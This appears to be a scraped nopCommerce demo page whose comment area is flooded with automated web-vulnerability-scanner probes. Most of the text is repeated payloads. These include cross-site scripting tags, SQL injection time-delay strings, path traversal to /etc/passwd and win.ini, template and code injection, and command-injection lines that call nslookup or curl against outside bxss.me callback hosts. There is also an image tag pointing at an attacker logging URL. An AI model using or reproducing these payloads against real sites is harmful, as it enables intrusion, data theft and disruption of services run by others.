For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
This is a sample comment...
1GDQ5TB86GS0
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
'"
<!--
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'"()&%<zzz><ScRiPt >NcWI(9378)</ScRiPt>
'"()&%<zzz><ScRiPt >NcWI(9491)</ScRiPt>
response.write(9352596*9729319)
9721341
'+response.write(9352596*9729319)+'
"+response.write(9352596*9729319)+"
NIcgy0OU
<% response.write(9352596*9729319) %>
bfg6341<s1﹥s2ʺs3ʹhjl6341
NF2KZMrH: RDPnRF04
+response.write(9352596*9729319)'
bfgx10379%C0%BEz1%C0%BCz2a%90bcxhjl10379
<%={{={@{#{${dfb}}%>
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
<th:t="${dfb}#foreach
file:///etc/passwd
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<esi:include src="http://bxss.me/rpb.png"/>
../
echo cqjclt$()\ jsrskg\nz^xyu||a #' &echo cqjclt$()\ jsrskg\nz^xyu||a #|" &echo cqjclt$()\ jsrskg\nz^xyu||a #
./
dfb{{98991*97996}}xca
&echo ixjryt$()\ acujzx\nz^xyu||a #' &echo ixjryt$()\ acujzx\nz^xyu||a #|" &echo ixjryt$()\ acujzx\nz^xyu||a #
|echo ewygut$()\ qdebpg\nz^xyu||a #' |echo ewygut$()\ qdebpg\nz^xyu||a #|" |echo ewygut$()\ qdebpg\nz^xyu||a #
expr 9000338917 - 955877
dfb[[${98991*97996}]]xca
(nslookup -q=cname hitzpmnmbuwxc7706f.bxss.me||curl hitzpmnmbuwxc7706f.bxss.me))
${9999465+10000401}
$(nslookup -q=cname hityraqrstsbl98e44.bxss.me||curl hityraqrstsbl98e44.bxss.me)
dfb__${98991*97996}__::.x
&nslookup -q=cname hitdfbfxquiznac5ab.bxss.me&'\"`0&nslookup -q=cname hitdfbfxquiznac5ab.bxss.me&`'
&(nslookup -q=cname hitydzogepqktad4b5.bxss.me||curl hitydzogepqktad4b5.bxss.me)&'\"`0&(nslookup -q=cname hitydzogepqktad4b5.bxss.me||curl hitydzogepqktad4b5.bxss.me)&`'
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
|(nslookup -q=cname hitkicvchupbo045e0.bxss.me||curl hitkicvchupbo045e0.bxss.me)
`(nslookup -q=cname hitmjvneisjvv95e45.bxss.me||curl hitmjvneisjvv95e45.bxss.me)`
<ScRiPt >NcWI(9881)</ScRiPt>
;(nslookup -q=cname hitisfugzozno3a597.bxss.me||curl hitisfugzozno3a597.bxss.me)|(nslookup -q=cname hitisfugzozno3a597.bxss.me||curl hitisfugzozno3a597.bxss.me)&(nslookup -q=cname hitisfugzozno3a597.bxss.me||curl hitisfugzozno3a597.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitqsiwbomqen8aca2.bxss.me||curl${IFS}hitqsiwbomqen8aca2.bxss.me)
'.gethostbyname(lc('hitph'.'ryxpcgsy1145a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(89).chr(107).chr(83).'
<WMNSIU>BOHMK[!+!]</WMNSIU>
&(nslookup${IFS}-q${IFS}cname${IFS}hitmeebugybvi4a33f.bxss.me||curl${IFS}hitmeebugybvi4a33f.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmeebugybvi4a33f.bxss.me||curl${IFS}hitmeebugybvi4a33f.bxss.me)&`'
".gethostbyname(lc("hitrz"."pmgwcnav0fca2.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(87).chr(112).chr(70)."
gethostbyname(lc('hitkb'.'qmbearfi49838.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(97).chr(83)
<script>NcWI(9539)</script>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
<script>NcWI(9479)</script>9479
${@print(md5(31337))}
${@print(md5(31337))}\
<ScR<ScRiPt>IpT>NcWI(9666)</sCr<ScRiPt>IpT>
'.print(md5(31337)).'
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
<ScRiPt >NcWI(9751)</ScRiPt>
ctimesleepp0(I30tp1Rp2.
/etc/shells
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9071></ScRiPt>
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
HttP://bxss.me/t/xss.html?%00
bxss.me
bxss.me/t/xss.html?%00
Http://bxss.me/t/fit.txt
<isindex type=image src=1 onerror=NcWI(9754)>
"+"A".concat(70-3).concat(22*4).concat(108).concat(76).concat(100).concat(75)+(require"socket"Socket.gethostbyname("hitak"+"dlomuqpv93fe2.bxss.me.")[3].to_s)+"
http://bxss.me/t/fit.txt?.jpg
'+'A'.concat(70-3).concat(22*4).concat(104).concat(74).concat(105).concat(79)+(require'socket'Socket.gethostbyname('hiten'+'tiyjhyirc7c9d.bxss.me.')[3].to_s)+'
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9044'>
'A'.concat(70-3).concat(22*4).concat(117).concat(86).concat(98).concat(66)+(require'socket'Socket.gethostbyname('hitil'+'pstndzbjd7209.bxss.me.')[3].to_s)
<body onload=NcWI(9147)>
<img src=//xss.bxss.me/t/dot.gif onload=NcWI(9191)>
<img src=xyz OnErRor=NcWI(9475)>
NewsCommentAdd
<img/src=">" onerror=alert(9714)>
NewsCommentAdd/.
%0D%0A%3C%53%63%52%69%50%74%20%3E%4E%63%57%49%289523%29%3C%2F%73%43%72%69%70%54%3E
redirtest.acx
\u003CScRiPt\NcWI(9647)\u003C/sCripT\u003E
&n969711=v935776
<ScRiPt>NcWI(9825)</sCripT>
)
%F6<img zzz onmouseover=NcWI(92171) //%F6>
!(()&&!|*|*|
^(#$!@#$)(()))******
<input autofocus onfocus=NcWI(9380)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(NcWI(9666))}
'"()
'&&sleep(27*1000)*ewsxvn&&'


"&&sleep(27*1000)*wwkavl&&"
L51El<ScRiPt >NcWI(9034)</ScRiPt>
'||sleep(27*1000)*iqcnsg||'
"||sleep(27*1000)*twlizr||"
<WFAHI3>XIDMU[!+!]</WFAHI3>
<ifRAme sRc=9223.com></IfRamE>
<a1yW0QV x=9092>
<img sRc='http://attacker-9333/log.php?
<aNWWNjy<
response.write(9779573*9934796)

'"()&%<zzz><ScRiPt >6aug(9728)</ScRiPt>
'+response.write(9779573*9934796)+'
"+response.write(9779573*9934796)+"
'"()&%<zzz><ScRiPt >6aug(9961)</ScRiPt>
<% response.write(9779573*9934796) %>
+response.write(9779573*9934796)'

9814962
bfg7595<s1﹥s2ʺs3ʹhjl7595
CYneAa5i
psE46riV: Mgb33GMW
bfgx2554%C0%BEz1%C0%BCz2a%90bcxhjl2554
echo fqtdlv$()\ swdkkp\nz^xyu||a #' &echo fqtdlv$()\ swdkkp\nz^xyu||a #|" &echo fqtdlv$()\ swdkkp\nz^xyu||a #
&echo lhhkue$()\ cdllza\nz^xyu||a #' &echo lhhkue$()\ cdllza\nz^xyu||a #|" &echo lhhkue$()\ cdllza\nz^xyu||a #
|echo jbekrc$()\ pxqfmr\nz^xyu||a #' |echo jbekrc$()\ pxqfmr\nz^xyu||a #|" |echo jbekrc$()\ pxqfmr\nz^xyu||a #

<esi:include src="http://bxss.me/rpb.png"/>
expr 9000569754 - 970665
(nslookup -q=cname hitjdvqcfnsum399df.bxss.me||curl hitjdvqcfnsum399df.bxss.me))
$(nslookup -q=cname hitmdrmawtzwre0098.bxss.me||curl hitmdrmawtzwre0098.bxss.me)
${10000186+9999212}
&nslookup -q=cname hitnvqgmwfpxy37496.bxss.me&'\"`0&nslookup -q=cname hitnvqgmwfpxy37496.bxss.me&`'
&(nslookup -q=cname hittnrcoyityndd0fe.bxss.me||curl hittnrcoyityndd0fe.bxss.me)&'\"`0&(nslookup -q=cname hittnrcoyityndd0fe.bxss.me||curl hittnrcoyityndd0fe.bxss.me)&`'
../

|(nslookup -q=cname hittpypwclium6772c.bxss.me||curl hittpypwclium6772c.bxss.me)
`(nslookup -q=cname hitrukmkaocgtcad2a.bxss.me||curl hitrukmkaocgtcad2a.bxss.me)`
;(nslookup -q=cname hityiaupfyzwcc621c.bxss.me||curl hityiaupfyzwcc621c.bxss.me)|(nslookup -q=cname hityiaupfyzwcc621c.bxss.me||curl hityiaupfyzwcc621c.bxss.me)&(nslookup -q=cname hityiaupfyzwcc621c.bxss.me||curl hityiaupfyzwcc621c.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitsutotimejffa7b7.bxss.me||curl${IFS}hitsutotimejffa7b7.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitqyfdnungusa9c06.bxss.me||curl${IFS}hitqyfdnungusa9c06.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqyfdnungusa9c06.bxss.me||curl${IFS}hitqyfdnungusa9c06.bxss.me)&`'

<ScRiPt >6aug(9815)</ScRiPt>
'.gethostbyname(lc('hitgn'.'jwpdhyzoc04da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(85).chr(107).chr(84).'
".gethostbyname(lc("hitwr"."uwskowbn07c86.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(86).chr(116).chr(65)."
gethostbyname(lc('hitez'.'ucfmxzeq67cd7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(87).chr(102).chr(72)

<WADXTE>UR8O4[!+!]</WADXTE>

<script>6aug(9977)</script>9977

<ScRiPt >6aug(9979)</ScRiPt>

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9880></ScRiPt>
"+"A".concat(70-3).concat(22*4).concat(119).concat(80).concat(122).concat(75)+(require"socket"Socket.gethostbyname("hitrd"+"itxmhpeq6fb40.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(120).concat(77).concat(101).concat(75)+(require'socket'Socket.gethostbyname('hitwj'+'ancopfrr63dee.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(101).concat(88).concat(114).concat(79)+(require'socket'Socket.gethostbyname('hitva'+'zzjiiiaic4f72.bxss.me.')[3].to_s)

<isindex type=image src=1 onerror=6aug(9684)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9913'>

<body onload=6aug(9353)>

&n959119=v969937

<img src=//xss.bxss.me/t/dot.gif onload=6aug(9747)>

<img src=xyz OnErRor=6aug(9134)>

<img/src=">" onerror=alert(9541)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%36%61%75%67%289341%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>6aug(9233)</sCripT>

'&&sleep(27*1000)*ewpkuj&&'
%F6<img zzz onmouseover=6aug(94731) //%F6>

"&&sleep(27*1000)*qumkhs&&"

'||sleep(27*1000)*sufiqr||'

"||sleep(27*1000)*spylvw||"

<input autofocus onfocus=6aug(9194)>

}body{zzz:Expre/**/SSion(6aug(9835))}

8ADc8<ScRiPt >6aug(9680)</ScRiPt>

<WTSJC6>VBYO5[!+!]</WTSJC6>

<ifRAme sRc=9245.com></IfRamE>

<aCDDjtf x=9837>

<img sRc='http://attacker-9605/log.php?

<aeoIv7n<
-1 OR 5*5=25 --
-1 OR 5*5=26 --
-1 OR 5*5=25
-1 OR 5*5=26
-1' OR 5*5=25 --
-1' OR 5*5=26 --
-1" OR 5*5=25 --
-1" OR 5*5=26 --
-1' OR 5*5=25 or 'mDn8CFNp'='
-1' OR 5*5=26 or 'mDn8CFNp'='
-1" OR 5*5=25 or "qdlIRaqS"="
-1" OR 5*5=26 or "qdlIRaqS"="
*if(now()=sysdate(),sleep(15),0)
0'XOR(*if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
-1' OR 5*5=25 or 'Eky3rtVC'='
-1" OR 5*5=25 or "hfHXa3Jy"="
-1 waitfor delay '0:0:15' --
if(now()=sysdate(),sleep(15),0)
KxMGaGKp'; waitfor delay '0:0:15' --

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
CfPFXIv2'); waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
aVVwWtuV')); waitfor delay '0:0:15' --
-1 OR 142=(SELECT 142 FROM PG_SLEEP(15))--

-1; waitfor delay '0:0:15' --
-1) OR 262=(SELECT 262 FROM PG_SLEEP(15))--

-1); waitfor delay '0:0:15' --
-1)) OR 187=(SELECT 187 FROM PG_SLEEP(15))--

-1 waitfor delay '0:0:15' --
K02pmgZB' OR 854=(SELECT 854 FROM PG_SLEEP(15))--

UHeQpUsx'; waitfor delay '0:0:15' --
e4WhXFmY') OR 561=(SELECT 561 FROM PG_SLEEP(15))--

P0l8xG9B'); waitfor delay '0:0:15' --
2X29WKqQ')) OR 37=(SELECT 37 FROM PG_SLEEP(15))--

1el0u3Qq')); waitfor delay '0:0:15' --
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

A3SZxvj9' OR 797=(SELECT 797 FROM PG_SLEEP(15))--
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
%C0%A7%C0%A2%2527%2522\'\"

2CeES6BN') OR 368=(SELECT 368 FROM PG_SLEEP(15))--
@@uqpD4
(select 198766*667891)
(select 198766*667891 from DUAL)

TpqN3eq2')) OR 176=(SELECT 176 FROM PG_SLEEP(15))--

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

'"

%C0%A7%C0%A2%2527%2522\'\"
@@vdqez
'"()&%<zzz><ScRiPt >qYzT(9315)</ScRiPt>
'"()&%<zzz><ScRiPt >qYzT(9559)</ScRiPt>
9431088
bfg3385<s1﹥s2ʺs3ʹhjl3385
bfgx8772%C0%BEz1%C0%BCz2a%90bcxhjl8772
<ScRiPt >qYzT(9475)</ScRiPt>
<WF7Z0G>DMMOZ[!+!]</WF7Z0G>
<script>qYzT(9484)</script>
<script>qYzT(9650)</script>9650
<ScR<ScRiPt>IpT>qYzT(9065)</sCr<ScRiPt>IpT>
<ScRiPt >qYzT(9433)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9473></ScRiPt>
<isindex type=image src=1 onerror=qYzT(9767)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9483'>
<body onload=qYzT(9758)>
<img src=//xss.bxss.me/t/dot.gif onload=qYzT(9514)>
<img src=xyz OnErRor=qYzT(9744)>
<img/src=">" onerror=alert(9886)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%71%59%7A%54%289636%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\qYzT(9303)\u003C/sCripT\u003E
<ScRiPt>qYzT(9276)</sCripT>
%F6<img zzz onmouseover=qYzT(95241) //%F6>
<input autofocus onfocus=qYzT(9217)>
}body{zzz:Expre/**/SSion(qYzT(9812))}
4wJA5<ScRiPt >qYzT(9216)</ScRiPt>
<WJSQVU>TE7YB[!+!]</WJSQVU>
<ifRAme sRc=9659.com></IfRamE>
<aFkvUxx x=9739>
<img sRc='http://attacker-9638/log.php?
<aRIIYAU<
This is a sample comment...
1GDQ5TB86GS0
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
'"
<!--
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'"()&%<zzz><ScRiPt >NcWI(9378)</ScRiPt>
'"()&%<zzz><ScRiPt >NcWI(9491)</ScRiPt>
response.write(9352596*9729319)
9721341
'+response.write(9352596*9729319)+'
"+response.write(9352596*9729319)+"
NIcgy0OU
<% response.write(9352596*9729319) %>
bfg6341<s1﹥s2ʺs3ʹhjl6341
NF2KZMrH: RDPnRF04
+response.write(9352596*9729319)'
bfgx10379%C0%BEz1%C0%BCz2a%90bcxhjl10379
<%={{={@{#{${dfb}}%>
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
<th:t="${dfb}#foreach
file:///etc/passwd
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<esi:include src="http://bxss.me/rpb.png"/>
../
echo cqjclt$()\ jsrskg\nz^xyu||a #' &echo cqjclt$()\ jsrskg\nz^xyu||a #|" &echo cqjclt$()\ jsrskg\nz^xyu||a #
./
dfb{{98991*97996}}xca
&echo ixjryt$()\ acujzx\nz^xyu||a #' &echo ixjryt$()\ acujzx\nz^xyu||a #|" &echo ixjryt$()\ acujzx\nz^xyu||a #
|echo ewygut$()\ qdebpg\nz^xyu||a #' |echo ewygut$()\ qdebpg\nz^xyu||a #|" |echo ewygut$()\ qdebpg\nz^xyu||a #
expr 9000338917 - 955877
dfb[[${98991*97996}]]xca
(nslookup -q=cname hitzpmnmbuwxc7706f.bxss.me||curl hitzpmnmbuwxc7706f.bxss.me))
${9999465+10000401}
$(nslookup -q=cname hityraqrstsbl98e44.bxss.me||curl hityraqrstsbl98e44.bxss.me)
dfb__${98991*97996}__::.x
&nslookup -q=cname hitdfbfxquiznac5ab.bxss.me&'\"`0&nslookup -q=cname hitdfbfxquiznac5ab.bxss.me&`'
&(nslookup -q=cname hitydzogepqktad4b5.bxss.me||curl hitydzogepqktad4b5.bxss.me)&'\"`0&(nslookup -q=cname hitydzogepqktad4b5.bxss.me||curl hitydzogepqktad4b5.bxss.me)&`'
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
|(nslookup -q=cname hitkicvchupbo045e0.bxss.me||curl hitkicvchupbo045e0.bxss.me)
`(nslookup -q=cname hitmjvneisjvv95e45.bxss.me||curl hitmjvneisjvv95e45.bxss.me)`
<ScRiPt >NcWI(9881)</ScRiPt>
;(nslookup -q=cname hitisfugzozno3a597.bxss.me||curl hitisfugzozno3a597.bxss.me)|(nslookup -q=cname hitisfugzozno3a597.bxss.me||curl hitisfugzozno3a597.bxss.me)&(nslookup -q=cname hitisfugzozno3a597.bxss.me||curl hitisfugzozno3a597.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitqsiwbomqen8aca2.bxss.me||curl${IFS}hitqsiwbomqen8aca2.bxss.me)
'.gethostbyname(lc('hitph'.'ryxpcgsy1145a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(89).chr(107).chr(83).'
<WMNSIU>BOHMK[!+!]</WMNSIU>
&(nslookup${IFS}-q${IFS}cname${IFS}hitmeebugybvi4a33f.bxss.me||curl${IFS}hitmeebugybvi4a33f.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitmeebugybvi4a33f.bxss.me||curl${IFS}hitmeebugybvi4a33f.bxss.me)&`'
".gethostbyname(lc("hitrz"."pmgwcnav0fca2.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(87).chr(112).chr(70)."
gethostbyname(lc('hitkb'.'qmbearfi49838.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(97).chr(83)
<script>NcWI(9539)</script>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
<script>NcWI(9479)</script>9479
${@print(md5(31337))}
${@print(md5(31337))}\
<ScR<ScRiPt>IpT>NcWI(9666)</sCr<ScRiPt>IpT>
'.print(md5(31337)).'
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
<ScRiPt
>NcWI(9751)</ScRiPt>
ctime
sleep
p0
(I30
tp1
Rp2
.
/etc/shells
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9071></ScRiPt>
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
HttP://bxss.me/t/xss.html?%00
bxss.me
bxss.me/t/xss.html?%00
Http://bxss.me/t/fit.txt
<isindex type=image src=1 onerror=NcWI(9754)>
"+"A".concat(70-3).concat(22*4).concat(108).concat(76).concat(100).concat(75)+(require"socket"
Socket.gethostbyname("hitak"+"dlomuqpv93fe2.bxss.me.")[3].to_s)+"
http://bxss.me/t/fit.txt?.jpg
'+'A'.concat(70-3).concat(22*4).concat(104).concat(74).concat(105).concat(79)+(require'socket'
Socket.gethostbyname('hiten'+'tiyjhyirc7c9d.bxss.me.')[3].to_s)+'
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9044'>
'A'.concat(70-3).concat(22*4).concat(117).concat(86).concat(98).concat(66)+(require'socket'
Socket.gethostbyname('hitil'+'pstndzbjd7209.bxss.me.')[3].to_s)
<body onload=NcWI(9147)>
<img src=//xss.bxss.me/t/dot.gif onload=NcWI(9191)>
<img src=xyz OnErRor=NcWI(9475)>
NewsCommentAdd
<img/src=">" onerror=alert(9714)>
NewsCommentAdd/.
%0D%0A%3C%53%63%52%69%50%74%20%3E%4E%63%57%49%289523%29%3C%2F%73%43%72%69%70%54%3E
redirtest.acx
\u003CScRiPt\NcWI(9647)\u003C/sCripT\u003E
&n969711=v935776
<ScRiPt>NcWI(9825)</sCripT>
)
%F6<img zzz onmouseover=NcWI(92171) //%F6>
!(()&&!|*|*|
^(#$!@#$)(()))******
<input autofocus onfocus=NcWI(9380)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(NcWI(9666))}
'"()
'&&sleep(27*1000)*ewsxvn&&'


"&&sleep(27*1000)*wwkavl&&"
L51El
<ScRiPt >NcWI(9034)</ScRiPt>
'||sleep(27*1000)*iqcnsg||'
"||sleep(27*1000)*twlizr||"
<WFAHI3>XIDMU[!+!]</WFAHI3>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


<ifRAme sRc=9223.com></IfRamE>
xfs.bxss.me






<a1yW0QV x=9092>
'"
<img sRc='http://attacker-9333/log.php?
<!--




<aNWWNjy<


response.write(9779573*9934796)

'"()&%<zzz><ScRiPt >6aug(9728)</ScRiPt>
'+response.write(9779573*9934796)+'


"+response.write(9779573*9934796)+"


'"()&%<zzz><ScRiPt >6aug(9961)</ScRiPt>
/../../../../../../../../../../windows/system32/BITSADMIN.exe
<% response.write(9779573*9934796) %>


+response.write(9779573*9934796)'

9814962








bfg7595<s1﹥s2ʺs3ʹhjl7595


CYneAa5i




psE46riV: Mgb33GMW
bfgx2554%C0%BEz1%C0%BCz2a%90bcxhjl2554




<%={{={@{#{${dfb}}%>


<th:t="${dfb}#foreach








1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


echo fqtdlv$()\ swdkkp\nz^xyu||a #' &echo fqtdlv$()\ swdkkp\nz^xyu||a #|" &echo fqtdlv$()\ swdkkp\nz^xyu||a #


&echo lhhkue$()\ cdllza\nz^xyu||a #' &echo lhhkue$()\ cdllza\nz^xyu||a #|" &echo lhhkue$()\ cdllza\nz^xyu||a #
dfb{{98991*97996}}xca


|echo jbekrc$()\ pxqfmr\nz^xyu||a #' |echo jbekrc$()\ pxqfmr\nz^xyu||a #|" |echo jbekrc$()\ pxqfmr\nz^xyu||a #

<esi:include src="http://bxss.me/rpb.png"/>
expr 9000569754 - 970665


../../../../../../../../../../../../../../etc/passwd
dfb[[${98991*97996}]]xca
(nslookup -q=cname hitjdvqcfnsum399df.bxss.me||curl hitjdvqcfnsum399df.bxss.me))
../../../../../../../../../../../../../../windows/win.ini
$(nslookup -q=cname hitmdrmawtzwre0098.bxss.me||curl hitmdrmawtzwre0098.bxss.me)


file:///etc/passwd
${10000186+9999212}
&nslookup -q=cname hitnvqgmwfpxy37496.bxss.me&'\"`0&nslookup -q=cname hitnvqgmwfpxy37496.bxss.me&`'


dfb__${98991*97996}__::.x


&(nslookup -q=cname hittnrcoyityndd0fe.bxss.me||curl hittnrcoyityndd0fe.bxss.me)&'\"`0&(nslookup -q=cname hittnrcoyityndd0fe.bxss.me||curl hittnrcoyityndd0fe.bxss.me)&`'
../


|(nslookup -q=cname hittpypwclium6772c.bxss.me||curl hittpypwclium6772c.bxss.me)


`(nslookup -q=cname hitrukmkaocgtcad2a.bxss.me||curl hitrukmkaocgtcad2a.bxss.me)`
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")




;(nslookup -q=cname hityiaupfyzwcc621c.bxss.me||curl hityiaupfyzwcc621c.bxss.me)|(nslookup -q=cname hityiaupfyzwcc621c.bxss.me||curl hityiaupfyzwcc621c.bxss.me)&(nslookup -q=cname hityiaupfyzwcc621c.bxss.me||curl hityiaupfyzwcc621c.bxss.me)


|(nslookup${IFS}-q${IFS}cname${IFS}hitsutotimejffa7b7.bxss.me||curl${IFS}hitsutotimejffa7b7.bxss.me)


&(nslookup${IFS}-q${IFS}cname${IFS}hitqyfdnungusa9c06.bxss.me||curl${IFS}hitqyfdnungusa9c06.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqyfdnungusa9c06.bxss.me||curl${IFS}hitqyfdnungusa9c06.bxss.me)&`'


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));



<ScRiPt >6aug(9815)</ScRiPt>
'.gethostbyname(lc('hitgn'.'jwpdhyzoc04da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(85).chr(107).chr(84).'
';print(md5(31337));$a='


".gethostbyname(lc("hitwr"."uwskowbn07c86.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(86).chr(116).chr(65)."
";print(md5(31337));$a="


gethostbyname(lc('hitez'.'ucfmxzeq67cd7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(87).chr(102).chr(72)
${@print(md5(31337))}

<WADXTE>UR8O4[!+!]</WADXTE>






${@print(md5(31337))}\




'.print(md5(31337)).'















<script>6aug(9977)</script>9977































<ScRiPt
>6aug(9979)</ScRiPt>
ctime
sleep
p0
(I30
tp1
Rp2
.



<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9880></ScRiPt>
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(119).concat(80).concat(122).concat(75)+(require"socket"
Socket.gethostbyname("hitrd"+"itxmhpeq6fb40.bxss.me.")[3].to_s)+"
NewsCommentAdd


'+'A'.concat(70-3).concat(22*4).concat(120).concat(77).concat(101).concat(75)+(require'socket'
Socket.gethostbyname('hitwj'+'ancopfrr63dee.bxss.me.')[3].to_s)+'




'A'.concat(70-3).concat(22*4).concat(101).concat(88).concat(114).concat(79)+(require'socket'
Socket.gethostbyname('hitva'+'zzjiiiaic4f72.bxss.me.')[3].to_s)


NewsCommentAdd/.






http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg



<isindex type=image src=1 onerror=6aug(9684)>










/etc/shells




../../../../../../../../../../../../../../etc/shells

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9913'>
c:/windows/win.ini
redirtest.acx
bxss.me






Http://bxss.me/t/fit.txt

<body onload=6aug(9353)>

&n959119=v969937


http://bxss.me/t/fit.txt?.jpg


)






!(()&&!|*|*|

<img src=//xss.bxss.me/t/dot.gif onload=6aug(9747)>




^(#$!@#$)(()))******











<img src=xyz OnErRor=6aug(9134)>





















<img/src=">" onerror=alert(9541)>








%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%36%61%75%67%289341%29%3C%2F%73%43%72%69%70%54%3E

















<ScRiPt>6aug(9233)</sCripT>




'"()





'&&sleep(27*1000)*ewpkuj&&'


%F6<img zzz onmouseover=6aug(94731) //%F6>

"&&sleep(27*1000)*qumkhs&&"



'||sleep(27*1000)*sufiqr||'



"||sleep(27*1000)*spylvw||"



<input autofocus onfocus=6aug(9194)>






<a HrEF=http://xss.bxss.me></a>






<a HrEF=jaVaScRiPT:>







}body{zzz:Expre/**/SSion(6aug(9835))}

8ADc8
<ScRiPt >6aug(9680)</ScRiPt>











<WTSJC6>VBYO5[!+!]</WTSJC6>











<ifRAme sRc=9245.com></IfRamE>

<aCDDjtf x=9837>

<img sRc='http://attacker-9605/log.php?

<aeoIv7n<






























-1 OR 5*5=25 --
-1 OR 5*5=26 --


-1 OR 5*5=25
-1 OR 5*5=26
-1' OR 5*5=25 --
-1' OR 5*5=26 --


-1" OR 5*5=25 --
-1" OR 5*5=26 --
-1' OR 5*5=25 or 'mDn8CFNp'='


-1' OR 5*5=26 or 'mDn8CFNp'='
-1" OR 5*5=25 or "qdlIRaqS"="
-1" OR 5*5=26 or "qdlIRaqS"="






*if(now()=sysdate(),sleep(15),0)








0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z






0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z








